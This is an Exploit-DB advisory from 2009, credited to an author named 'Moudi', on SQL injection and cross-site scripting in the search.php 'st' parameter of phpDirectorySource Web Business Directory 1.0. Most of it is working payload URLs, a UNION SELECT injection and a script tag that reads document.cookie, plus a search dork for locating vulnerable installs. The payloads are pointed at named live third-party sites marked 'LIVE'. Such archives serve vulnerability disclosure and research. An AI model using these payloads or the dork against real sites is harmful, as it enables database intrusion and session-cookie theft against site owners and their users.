phpDirectorySource 1.0 - Cross-Site Scripting / SQL Injection

EDB-ID:

9226


Author:

Moudi

Type:

webapps


Platform:

PHP

Date:

2009-07-21


==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] Web Business Directory 1.0 (search.php) Multiple Remote Vulnerabilities
==============================================================================

	[»] Script:             [ Web Business Directory 1.0 ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.phpdirectorysource.com/  ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ Copyright 2005-2006 phpDirectorySource™, all rights reserved ]
        [»] Price:              [ $75.00   ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit SQL INJECTION + LIVE : vulnerability ]===

[»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=

[»] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/*
[»] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st=XX' union select version()/*

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=

[»] http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&st="><script>alert(document.cookie);</script>
[»] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st="><script>alert(document.cookie);</script>


Author: Moudi

###########################################################################

# milw0rm.com [2009-07-21]